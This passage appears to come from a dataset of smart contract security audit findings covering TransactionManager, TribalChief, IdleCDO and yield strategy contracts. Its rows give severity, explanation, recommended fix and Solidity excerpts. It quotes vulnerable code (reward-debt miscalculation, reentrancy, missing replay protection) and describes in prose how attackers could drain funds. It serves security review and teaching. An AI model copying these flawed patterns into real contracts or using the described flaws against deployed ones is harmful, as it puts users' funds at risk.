may `selfdestruct` and the check is not repeated later, there is no guarantee that `callTo` still contains code when the call to this address (assuming it is non-zero) is actually executed in FulfillInterpreter.execute:\\n```\\n// Try to execute the 
callData\\n// the low level call will return `false` if its execution reverts\\n(bool success, bytes memory returnData) = callTo.call{value: isEther ? amount : 0}(callData);\\n\\nif (!success) {\\n // If it fails, transfer to fallback\\n Asset.transferAsset(assetId, fallbackAddress, amount);\\n // Decrease allowance\\n if (!isEther) {\\n Asset.decreaseERC20Allowance(assetId, callTo, amount);\\n }\\n}\\n```\\n\\nAs a result, if the contract at `callTo` self-destructs between `prepare` and `fulfill` (both on the receiving chain), `success` will be `true`, and the funds will probably be lost to the user.\\nA user could currently try to avoid this by checking that the contract still exists before calling `fulfill` on the receiving chain, but even then, they might get front-run by `selfdestruct`, and the situation is even worse with a relayer, so this provides no reliable protection.","Repeat the `Address.isContract` check on `callTo` before making the external call in `FulfillInterpreter.execute` and send the funds to the `fallbackAddress` if the result is `false`.\\nIt is, perhaps, debatable whether the check in `prepare` should be kept or removed. In principle, if the contract gets deployed between `prepare` and `fulfill`, that is still soon enough. However, if the `callTo` address doesn't have code at the time of `prepare`, this seems more likely to be a mistake than a “late deployment”. So unless there is a demonstrated use case for ���late deployments”, failing in `prepare` (even though it's receiver-side) might still be the better choice.\\nRemark\\nIt should be noted that an unsuccessful call, i.e., a revert, is the only behavior that is recognized by `FulfillInterpreter.execute` as failure. 
While it is prevalent to indicate failure by reverting, this doesn't have to be the case; a well-known example is an ERC20 token that indicates a failing transfer by returning `false`.\\nA user who wants to utilize this feature has to make sure that the called contract behaves accordingly; if that is not the case, an intermediary contract may be employed, which, for example, reverts for return value `false`.",,"```\\n// Check that the callTo is a contract\\n// NOTE: This cannot happen on the sending chain (different chain\\n// contexts), so a user could mistakenly create a transfer that must be\\n// cancelled if this is incorrect\\nrequire(invariantData.callTo == address(0) || Address.isContract(invariantData.callTo), ""#P:031"");\\n```\\n" +TransactionManager - Adherence to EIP-712 Won't Fix,low,"`fulfill` function requires the user signature on a `transactionId`. While currently, the user SDK code is using a cryptographically secured pseudo-random function to generate the `transactionId`, it should not be counted upon and measures should be placed on the smart-contract level to ensure replay-attack protection.\\n```\\nfunction recoverSignature(\\n bytes32 transactionId,\\n uint256 relayerFee,\\n string memory functionIdentifier,\\n bytes calldata signature\\n) internal pure returns (address) {\\n // Create the signed payload\\n SignedData memory payload = SignedData({\\n transactionId: transactionId,\\n relayerFee: relayerFee,\\n functionIdentifier: functionIdentifier\\n });\\n\\n // Recover\\n return ECDSA.recover(ECDSA.toEthSignedMessageHash(keccak256(abi.encode(payload))), signature);\\n}\\n```\\n","Consider adhering to EIP-712, or at least including `address(this), block.chainId` as part of the data signed by the user.",,"```\\nfunction recoverSignature(\\n bytes32 transactionId,\\n uint256 relayerFee,\\n string memory functionIdentifier,\\n bytes calldata signature\\n) internal pure returns (address) {\\n // Create the signed payload\\n SignedData memory 
payload = SignedData({\\n transactionId: transactionId,\\n relayerFee: relayerFee,\\n functionIdentifier: functionIdentifier\\n });\\n\\n // Recover\\n return ECDSA.recover(ECDSA.toEthSignedMessageHash(keccak256(abi.encode(payload))), signature);\\n}\\n```\\n" +TransactionManager - Hard-coded chain ID might lead to problems after a chain split Pending,low,"The ID of the chain on which the contract is deployed is supplied as a constructor argument and stored as an `immutable` state variable:\\n```\\n/\\*\\*\\n \\* @dev The chain id of the contract, is passed in to avoid any evm issues\\n \\*/\\nuint256 public immutable chainId;\\n```\\n\\n```\\nconstructor(uint256 \\_chainId) {\\n chainId = \\_chainId;\\n interpreter = new FulfillInterpreter(address(this));\\n}\\n```\\n\\nHence, `chainId` can never change, and even after a chain split, both contracts would continue to use the same chain ID. That can have undesirable consequences. For example, a transaction that was prepared before the split could be fulfilled on both chains.","It would be better to query the chain ID directly from the chain via `block.chainId`. However, the development team informed us that they had encountered problems with this approach as some chains apparently are not implementing this correctly. They resorted to the method described above, a constructor-supplied, hard-coded value. For chains that do indeed not inform correctly about their chain ID, this is a reasonable solution. 
However, for the reasons outlined above, we still recommend querying the chain ID via `block.chainId` for chains that do support that — which should be the vast majority — and using the fallback mechanism only when necessary.",,"```\\n/\\*\\*\\n \\* @dev The chain id of the contract, is passed in to avoid any evm issues\\n \\*/\\nuint256 public immutable chainId;\\n```\\n" +TribalChief - A wrong user.rewardDebt value is calculated during the withdrawFromDeposit function call,high,"When withdrawing a single deposit, the reward debt is updated:\\n```\\nuint128 virtualAmountDelta = uint128( ( amount \\* poolDeposit.multiplier ) / SCALE\\_FACTOR );\\n\\n// Effects\\npoolDeposit.amount -= amount;\\nuser.rewardDebt = user.rewardDebt - toSigned128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\nuser.virtualAmount -= virtualAmountDelta;\\npool.virtualTotalSupply -= virtualAmountDelta;\\n```\\n\\nInstead of the `user.virtualAmount` in reward debt calculation, the `virtualAmountDelta` should be used. Because of that bug, the reward debt is much lower than it would be, which means that the reward itself will be much larger during the harvest. By making multiple deposit-withdraw actions, any user can steal all the Tribe tokens from the contract.",Use the `virtualAmountDelta` instead of the `user.virtualAmount`.,,```\\nuint128 virtualAmountDelta = uint128( ( amount \\* poolDeposit.multiplier ) / SCALE\\_FACTOR );\\n\\n// Effects\\npoolDeposit.amount -= amount;\\nuser.rewardDebt = user.rewardDebt - toSigned128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\nuser.virtualAmount -= virtualAmountDelta;\\npool.virtualTotalSupply -= virtualAmountDelta;\\n```\\n +TribalChief - Unlocking users' funds in a pool where a multiplier has been increased is missing,medium,"When a user deposits funds to a pool, the current multiplier in use for this pool is being stored locally for this deposit. 
The value that is used later in a withdrawal operation is the local one, and not the one that is changing when a `governor` calls `governorAddPoolMultiplier`. It means that a decrease in the multiplier value for a given pool does not affect users that already deposited, but an increase does. Users that had already deposited should have the right to withdraw their funds when the multiplier for their pool increases by the `governor`.\\n```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\n",Replace the `<` operator with `>` in `TribalChief` line 152.,,"```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\n" +TribalChief - Unsafe down-castings,medium,"`TribalChief` consists of multiple unsafe down-casting operations. 
While the usage of types that can be packed into a single storage slot is more gas efficient, it may introduce hidden risks in some cases that can lead to loss of funds.\\nVarious instances in `TribalChief`, including (but not necessarily only) :\\n```\\nuser.rewardDebt = int128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\n```\\n\\n```\\npool.accTribePerShare = uint128(pool.accTribePerShare + ((tribeReward \\* ACC\\_TRIBE\\_PRECISION) / virtualSupply));\\n```\\n\\n```\\nuserPoolData.rewardDebt += int128(virtualAmountDelta \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\n```\\n","Given the time constraints of this audit engagement, we could not verify the implications and provide mitigation actions for each of the unsafe down-castings operations. However, we do recommend to either use numeric types that use 256 bits, or to add proper validation checks and handle these scenarios to avoid silent over/under-flow errors. Keep in mind that reverting these scenarios can sometimes lead to a denial of service, which might be harmful in some cases.",,```\\nuser.rewardDebt = int128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\n```\\n +TribalChief - Governor decrease of pool's allocation point should unlock depositors' funds,low,"When the `TribalChief` governor decreases the ratio between the allocation point (PoolInfo.allocPoint) and the total allocation point (totalAllocPoint) for a specific pool (either be directly decreasing `PoolInfo.allocPoint` of a given pool, or by increasing this value for other pools), the total reward for this pool is decreased as well. 
Depositors should be able to withdraw their funds immediately after this kind of change.\\n```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\n",Make sure that depositors' funds are unlocked for pools that affected negatively by calling `TribalChief.set`.,,"```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\n" +TribalChief - new block reward retrospectively takes effect on pools that have not been updated recently,low,"When the governor updates the block reward `tribalChiefTribePerBlock` the new reward is applied for the outstanding duration of blocks in `updatePool`. 
This means, if a pool hasn't updated in a while (unlikely) the new block reward is retrospectively applied to the pending duration instead of starting from when the block reward changed.\\nrewards calculation\\n```\\nif (virtualSupply > 0) {\\n uint256 blocks = block.number - pool.lastRewardBlock;\\n uint256 tribeReward = (blocks \\* tribePerBlock() \\* pool.allocPoint) / totalAllocPoint;\\n pool.accTribePerShare = uint128(pool.accTribePerShare + ((tribeReward \\* ACC\\_TRIBE\\_PRECISION) / virtualSupply));\\n}\\n```\\n\\nupdating the block reward\\n```\\n/// @notice Allows governor to change the amount of tribe per block\\n/// @param newBlockReward The new amount of tribe per block to distribute\\nfunction updateBlockReward(uint256 newBlockReward) external onlyGovernor {\\n tribalChiefTribePerBlock = newBlockReward;\\n emit NewTribePerBlock(newBlockReward);\\n}\\n```\\n",It is recommended to update pools before changing the block reward. Document and make users aware that the new reward is applied to the outstanding duration when calling `updatePool`.,,```\\nif (virtualSupply > 0) {\\n uint256 blocks = block.number - pool.lastRewardBlock;\\n uint256 tribeReward = (blocks \\* tribePerBlock() \\* pool.allocPoint) / totalAllocPoint;\\n pool.accTribePerShare = uint128(pool.accTribePerShare + ((tribeReward \\* ACC\\_TRIBE\\_PRECISION) / virtualSupply));\\n}\\n```\\n +TribalChief - resetRewards should emit an event,low,The method `resetRewards` silently resets a pools tribe allocation.\\n```\\n/// @notice Reset the given pool's TRIBE allocation to 0 and unlock the pool. Can only be called by the governor or guardian.\\n/// @param \\_pid The index of the pool. See `poolInfo`. 
\\nfunction resetRewards(uint256 \\_pid) public onlyGuardianOrGovernor {\\n // set the pool's allocation points to zero\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint);\\n poolInfo[\\_pid].allocPoint = 0;\\n \\n // unlock all staked tokens in the pool\\n poolInfo[\\_pid].unlocked = true;\\n\\n // erase any IRewarder mapping\\n rewarder[\\_pid] = IRewarder(address(0));\\n}\\n```\\n,For transparency and to create an easily accessible audit trail of events consider emitting an event when resetting a pools allocation.,,```\\n/// @notice Reset the given pool's TRIBE allocation to 0 and unlock the pool. Can only be called by the governor or guardian.\\n/// @param \\_pid The index of the pool. See `poolInfo`. \\nfunction resetRewards(uint256 \\_pid) public onlyGuardianOrGovernor {\\n // set the pool's allocation points to zero\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint);\\n poolInfo[\\_pid].allocPoint = 0;\\n \\n // unlock all staked tokens in the pool\\n poolInfo[\\_pid].unlocked = true;\\n\\n // erase any IRewarder mapping\\n rewarder[\\_pid] = IRewarder(address(0));\\n}\\n```\\n +TribalChief - Unlocking users' funds in a pool where a multiplier has been increased is missing,medium,"When a user deposits funds to a pool, the current multiplier in use for this pool is being stored locally for this deposit. The value that is used later in a withdrawal operation is the local one, and not the one that is changing when a `governor` calls `governorAddPoolMultiplier`. It means that a decrease in the multiplier value for a given pool does not affect users that already deposited, but an increase does. 
Users that had already deposited should have the right to withdraw their funds when the multiplier for their pool increases by the `governor`.\\n```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\n",Replace the `<` operator with `>` in `TribalChief` line 152.,,"```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\n" +TribalChief - Governor decrease of pool's allocation point should unlock depositors' funds,low,"When the `TribalChief` governor decreases the ratio between the allocation point (PoolInfo.allocPoint) and the total allocation point (totalAllocPoint) for a specific pool (either be directly decreasing `PoolInfo.allocPoint` of a given pool, or by increasing this value for other pools), the total reward for this pool is decreased as well. 
Depositors should be able to withdraw their funds immediately after this kind of change.\\n```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\n",Make sure that depositors' funds are unlocked for pools that affected negatively by calling `TribalChief.set`.,,"```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\n" +IdleCDO._deposit() allows re-entrancy from hookable tokens.,medium,"The function `IdleCDO._deposit()` updates the system's internal accounting and mints shares to the caller, then transfers the deposited funds from the user. Some token standards, such as ERC777, allow a callback to the source of the funds before the balances are updated in `transferFrom()`. 
This callback could be used to re-enter the protocol while already holding the minted tranche tokens and at a point where the system accounting reflects a receipt of funds that has not yet occurred.\\nWhile an attacker could not interact with `IdleCDO.withdraw()` within this callback because of the `_checkSameTx()` restriction, they would be able to interact with the rest of the protocol.\\n```\\nfunction \\_deposit(uint256 \\_amount, address \\_tranche) internal returns (uint256 \\_minted) {\\n // check that we are not depositing more than the contract available limit\\n \\_guarded(\\_amount);\\n // set \\_lastCallerBlock hash\\n \\_updateCallerBlock();\\n // check if strategyPrice decreased\\n \\_checkDefault();\\n // interest accrued since last depositXX/withdrawXX/harvest is splitted between AA and BB\\n // according to trancheAPRSplitRatio. NAVs of AA and BB are updated and tranche\\n // prices adjusted accordingly\\n \\_updateAccounting();\\n // mint tranche tokens according to the current tranche price\\n \\_minted = \\_mintShares(\\_amount, msg.sender, \\_tranche);\\n // get underlyings from sender\\n IERC20Detailed(token).safeTransferFrom(msg.sender, address(this), \\_amount);\\n}\\n```\\n",Move the `transferFrom()` action in `_deposit()` to immediately after `_updateCallerBlock()`.,,"```\\nfunction \\_deposit(uint256 \\_amount, address \\_tranche) internal returns (uint256 \\_minted) {\\n // check that we are not depositing more than the contract available limit\\n \\_guarded(\\_amount);\\n // set \\_lastCallerBlock hash\\n \\_updateCallerBlock();\\n // check if strategyPrice decreased\\n \\_checkDefault();\\n // interest accrued since last depositXX/withdrawXX/harvest is splitted between AA and BB\\n // according to trancheAPRSplitRatio. 
NAVs of AA and BB are updated and tranche\\n // prices adjusted accordingly\\n \\_updateAccounting();\\n // mint tranche tokens according to the current tranche price\\n \\_minted = \\_mintShares(\\_amount, msg.sender, \\_tranche);\\n // get underlyings from sender\\n IERC20Detailed(token).safeTransferFrom(msg.sender, address(this), \\_amount);\\n}\\n```\\n" +IdleCDO.virtualPrice() and _updatePrices() yield different prices in a number of cases,medium,"The function `IdleCDO.virtualPrice()` is used to determine the current price of a tranche. Similarly, `IdleCDO._updatePrices()` is used to store the latest price of a tranche, as well as update other parts of the system accounting. There are a number of cases where the prices yielded by these two functions differ. While these are primarily corner cases that are not obviously exploitable in practice, potential violations of key accounting invariants should always be considered serious.\\nAdditionally, the use of two separate implementations of the same calculation suggest the potential for more undiscovered discrepancies, possibly of higher consequence.\\nAs an example, in `_updatePrices()` the precision loss from splitting the strategy returns favors BB tranche holders. 
In `virtualPrice()` both branches of the price calculation incur precision loss, favoring the `IdleCDO` contract itself.\\n`_updatePrices()`\\n```\\nif (BBTotSupply == 0) {\\n // if there are no BB holders, all gain to AA\\n AAGain = gain;\\n} else if (AATotSupply == 0) {\\n // if there are no AA holders, all gain to BB\\n BBGain = gain;\\n} else {\\n // split the gain between AA and BB holders according to trancheAPRSplitRatio\\n AAGain = gain \\* trancheAPRSplitRatio / FULL\\_ALLOC;\\n BBGain = gain - AAGain;\\n}\\n```\\n\\n`virtualPrice()`\\n```\\nif (\\_tranche == AATranche) {\\n // calculate gain for AA tranche\\n // trancheGain (AAGain) = gain \\* trancheAPRSplitRatio / FULL\\_ALLOC;\\n trancheNAV = lastNAVAA + (gain \\* \\_trancheAPRSplitRatio / FULL\\_ALLOC);\\n} else {\\n // calculate gain for BB tranche\\n // trancheGain (BBGain) = gain \\* (FULL\\_ALLOC - trancheAPRSplitRatio) / FULL\\_ALLOC;\\n trancheNAV = lastNAVBB + (gain \\* (FULL\\_ALLOC - \\_trancheAPRSplitRatio) / FULL\\_ALLOC);\\n}\\n```\\n","Implement a single method that determines the current price for a tranche, and use this same implementation anywhere the price is needed.",,"```\\nif (BBTotSupply == 0) {\\n // if there are no BB holders, all gain to AA\\n AAGain = gain;\\n} else if (AATotSupply == 0) {\\n // if there are no AA holders, all gain to BB\\n BBGain = gain;\\n} else {\\n // split the gain between AA and BB holders according to trancheAPRSplitRatio\\n AAGain = gain \\* trancheAPRSplitRatio / FULL\\_ALLOC;\\n BBGain = gain - AAGain;\\n}\\n```\\n" +IdleCDO.harvest() allows price manipulation in certain circumstances,medium,"The function `IdleCDO.harvest()` uses Uniswap to liquidate rewards earned by the contract's strategy, then updates the relevant positions and internal accounting. 
This function can only be called by the contract `owner` or the designated `rebalancer` address, and it accepts an array which indicates the minimum buy amounts for the liquidation of each reward token.\\nThe purpose of permissioning this method and specifying minimum buy amounts is to prevent a sandwiching attack from manipulating the reserves of the Uniswap pools and forcing the `IdleCDO` contract to incur loss due to price slippage.\\nHowever, this does not effectively prevent price manipulation in all cases. Because the contract sells it's entire balance of redeemed rewards for the specified minimum buy amount, this approach does not enforce a minimum price for the executed trades. If the balance of `IdleCDO` or the amount of claimable rewards increases between the submission of the `harvest()` transaction and its execution, it may be possible to perform a profitable sandwiching attack while still satisfying the required minimum buy amounts.\\nThe viability of this exploit depends on how effectively an attacker can increase the amount of rewards tokens to be sold without incurring an offsetting loss. 
The strategy contracts used by `IdleCDO` are expected to vary widely in their implementations, and this manipulation could potentially be done either through direct interaction with the protocol or as part of a flashbots bundle containing a large position adjustment from an honest user.\\n```\\nfunction harvest(bool \\_skipRedeem, bool \\_skipIncentivesUpdate, bool[] calldata \\_skipReward, uint256[] calldata \\_minAmount) external {\\n require(msg.sender == rebalancer || msg.sender == owner(), ""IDLE:!AUTH"");\\n```\\n\\n```\\n// approve the uniswap router to spend our reward\\nIERC20Detailed(rewardToken).safeIncreaseAllowance(address(\\_uniRouter), \\_currentBalance);\\n// do the uniswap trade\\n\\_uniRouter.swapExactTokensForTokensSupportingFeeOnTransferTokens(\\n \\_currentBalance,\\n \\_minAmount[i],\\n \\_path,\\n address(this),\\n block.timestamp + 1\\n);\\n```\\n",Update `IdleCDO.harvest()` to enforce a minimum price rather than a minimum buy amount. One method of doing so would be taking an additional array parameter indicating the amount of each token to sell in exchange for the respective buy amount.,,"```\\nfunction harvest(bool \\_skipRedeem, bool \\_skipIncentivesUpdate, bool[] calldata \\_skipReward, uint256[] calldata \\_minAmount) external {\\n require(msg.sender == rebalancer || msg.sender == owner(), ""IDLE:!AUTH"");\\n```\\n" +Missing Sanity checks,low,The implementation of `initialize()` functions are missing some sanity checks. 
The proper checks are implemented in some of the setter functions but missing in some others.\\nMissing sanity check for `!= address(0)`\\n```\\ntoken = \\_guardedToken;\\nstrategy = \\_strategy;\\nstrategyToken = IIdleCDOStrategy(\\_strategy).strategyToken();\\nrebalancer = \\_rebalancer;\\n```\\n\\n```\\nguardian = \\_owner;\\n```\\n\\n```\\naddress \\_currAAStaking = AAStaking;\\naddress \\_currBBStaking = BBStaking;\\n```\\n\\n```\\nidleCDO = \\_idleCDO;\\ntranche = \\_trancheToken;\\nrewards = \\_rewards;\\ngovernanceRecoveryFund = \\_governanceRecoveryFund;\\n```\\n,Resolution\\nThe development team has addressed this concern in commit `a1d5dac0ad5f562d4c75bff99e770d92bcc2a72f`. This change has not been reviewed by the audit team.\\nAdd sanity checks before assigning system variables.,,```\\ntoken = \\_guardedToken;\\nstrategy = \\_strategy;\\nstrategyToken = IIdleCDOStrategy(\\_strategy).strategyToken();\\nrebalancer = \\_rebalancer;\\n```\\n +Frontrunning attacks by the owner,high,"There are few possible attack vectors by the owner:\\nAll strategies have fees from rewards. In addition to that, the PancakeSwap strategy has deposit fees. The default deposit fees equal zero; the maximum is limited to 5%:\\n```\\nuint256 constant MAXIMUM\\_DEPOSIT\\_FEE = 5e16; // 5%\\nuint256 constant DEFAULT\\_DEPOSIT\\_FEE = 0e16; // 0%\\n \\nuint256 constant MAXIMUM\\_PERFORMANCE\\_FEE = 50e16; // 50%\\nuint256 constant DEFAULT\\_PERFORMANCE\\_FEE = 10e16; // 10%\\n```\\n\\nWhen a user deposits tokens, expecting to have zero deposit fees, the `owner` can frontrun the deposit and increase fees to 5%. If the deposit size is big enough, that may be a significant amount of money. 2. 
In the `gulp` function, the reward tokens are exchanged for the reserve tokens on the exchange:\\n```\\nfunction gulp(uint256 \\_minRewardAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n uint256 \\_pendingReward = \\_getPendingReward();\\n if (\\_pendingReward > 0) {\\n \\_withdraw(0);\\n }\\n {\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n uint256 \\_feeReward = \\_totalReward.mul(performanceFee) / 1e18;\\n Transfers.\\_pushFunds(rewardToken, collector, \\_feeReward);\\n }\\n if (rewardToken != routingToken) {\\n require(exchange != address(0), ""exchange not set"");\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n Transfers.\\_approveFunds(rewardToken, exchange, \\_totalReward);\\n IExchange(exchange).convertFundsFromInput(rewardToken, routingToken, \\_totalReward, 1);\\n }\\n if (routingToken != reserveToken) {\\n require(exchange != address(0), ""exchange not set"");\\n uint256 \\_totalRouting = Transfers.\\_getBalance(routingToken);\\n Transfers.\\_approveFunds(routingToken, exchange, \\_totalRouting);\\n IExchange(exchange).joinPoolFromInput(reserveToken, routingToken, \\_totalRouting, 1);\\n }\\n uint256 \\_totalBalance = Transfers.\\_getBalance(reserveToken);\\n require(\\_totalBalance >= \\_minRewardAmount, ""high slippage"");\\n \\_deposit(\\_totalBalance);\\n}\\n```\\n\\nThe `owner` can change the `exchange` parameter to the malicious address that steals tokens. The `owner` then calls `gulp` with `_minRewardAmount==0`, and all the rewards will be stolen. 
The same attack can be implemented in fee collectors and the buyback contract.",Resolution\\nThe client communicated this issue was addressed in commit 34c6b355795027d27ae6add7360e61eb6b01b91b.\\nUse a timelock to avoid instant changes of the parameters.,,```\\nuint256 constant MAXIMUM\\_DEPOSIT\\_FEE = 5e16; // 5%\\nuint256 constant DEFAULT\\_DEPOSIT\\_FEE = 0e16; // 0%\\n \\nuint256 constant MAXIMUM\\_PERFORMANCE\\_FEE = 50e16; // 50%\\nuint256 constant DEFAULT\\_PERFORMANCE\\_FEE = 10e16; // 10%\\n```\\n +Expected amounts of tokens in the withdraw function,medium,"Every `withdraw` function in the strategy contracts is calculating the expected amount of the returned tokens before withdrawing them:\\n```\\nfunction withdraw(uint256 \\_shares, uint256 \\_minAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n address \\_from = msg.sender;\\n (uint256 \\_amount, uint256 \\_withdrawalAmount, uint256 \\_netAmount) = \\_calcAmountFromShares(\\_shares);\\n require(\\_netAmount >= \\_minAmount, ""high slippage"");\\n \\_burn(\\_from, \\_shares);\\n \\_withdraw(\\_amount);\\n Transfers.\\_pushFunds(reserveToken, \\_from, \\_withdrawalAmount);\\n}\\n```\\n\\nAfter that, the contract is trying to transfer this pre-calculated amount to the `msg.sender`. It is never checked whether the intended amount was actually transferred to the strategy contract. If the amount is lower, that may result in reverting the `withdraw` function all the time and locking up tokens.\\nEven though we did not find any specific case of returning a different amount of tokens, it is still a good idea to handle this situation to minimize relying on the security of the external contracts.","Resolution\\nClient's statement : “This issue did not really need fixing. 
The mitigation was already in place by depositing a tiny amount of the reserve into the contract, if necessary”\\nThere are a few options how to mitigate the issue:\\nDouble-check the balance difference before and after the MasterChef's `withdraw` function is called.\\nHandle this situation in the emergency mode (https://github.com/ConsenSys/growthdefi-audit-2021-06/issues/11).",,"```\\nfunction withdraw(uint256 \\_shares, uint256 \\_minAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n address \\_from = msg.sender;\\n (uint256 \\_amount, uint256 \\_withdrawalAmount, uint256 \\_netAmount) = \\_calcAmountFromShares(\\_shares);\\n require(\\_netAmount >= \\_minAmount, ""high slippage"");\\n \\_burn(\\_from, \\_shares);\\n \\_withdraw(\\_amount);\\n Transfers.\\_pushFunds(reserveToken, \\_from, \\_withdrawalAmount);\\n}\\n```\\n" +The capping mechanism for Panther token leads to increased fees,medium,"Panther token has a cap in transfer sizes, so any transfer in the contract is limited beforehand:\\n```\\nfunction gulp(uint256 \\_minRewardAmount) external onlyEOAorWhitelist nonReentrant\\n{\\n uint256 \\_pendingReward = \\_getPendingReward();\\n if (\\_pendingReward > 0) {\\n \\_withdraw(0);\\n }\\n uint256 \\_\\_totalReward = Transfers.\\_getBalance(rewardToken);\\n (uint256 \\_feeReward, uint256 \\_retainedReward) = \\_capFeeAmount(\\_\\_totalReward.mul(performanceFee) / 1e18);\\n Transfers.\\_pushFunds(rewardToken, buyback, \\_feeReward);\\n if (rewardToken != routingToken) {\\n require(exchange != address(0), ""exchange not set"");\\n uint256 \\_totalReward = Transfers.\\_getBalance(rewardToken);\\n \\_totalReward = \\_capTransferAmount(rewardToken, \\_totalReward, \\_retainedReward);\\n Transfers.\\_approveFunds(rewardToken, exchange, \\_totalReward);\\n IExchange(exchange).convertFundsFromInput(rewardToken, routingToken, \\_totalReward, 1);\\n }\\n if (routingToken != reserveToken) {\\n require(exchange != address(0), ""exchange not set"");\\n uint256 
\\_totalRouting = Transfers.\\_getBalance(routingToken);\\n \\_totalRouting = \\_capTransferAmount(routingToken, \\_totalRouting, \\_retainedReward);\\n Transfers.\\_approveFunds(routingToken, exchange, \\_totalRouting);\\n IExchange(exchange).joinPoolFromInput(reserveToken, routingToken, \\_totalRouting, 1);\\n }\\n uint256 \\_totalBalance = Transfers.\\_getBalance(reserveToken);\\n \\_totalBalance = \\_capTransferAmount(reserveToken, \\_totalBalance, \\_retainedReward);\\n require(\\_totalBalance >= \\_minRewardAmount, ""high slippage"");\\n \\_deposit(\\_totalBalance);\\n}\\n```\\n\\nFees here are calculated from the full amount of rewards (__totalReward ):\\n```\\n(uint256 \\_feeReward, uint256 \\_retainedReward) = \\_capFeeAmount(\\_\\_totalReward.mul(performanceFee) / 1e18);\\n```\\n\\nBut in fact, if the amount of the rewards is too big, it will be capped, and the residuals will be “taxed” again during the next call of the `gulp` function. That behavior leads to multiple taxations of the same tokens, which means increased fees.",Resolution\\nThe client communicated this issue was addressed in commit 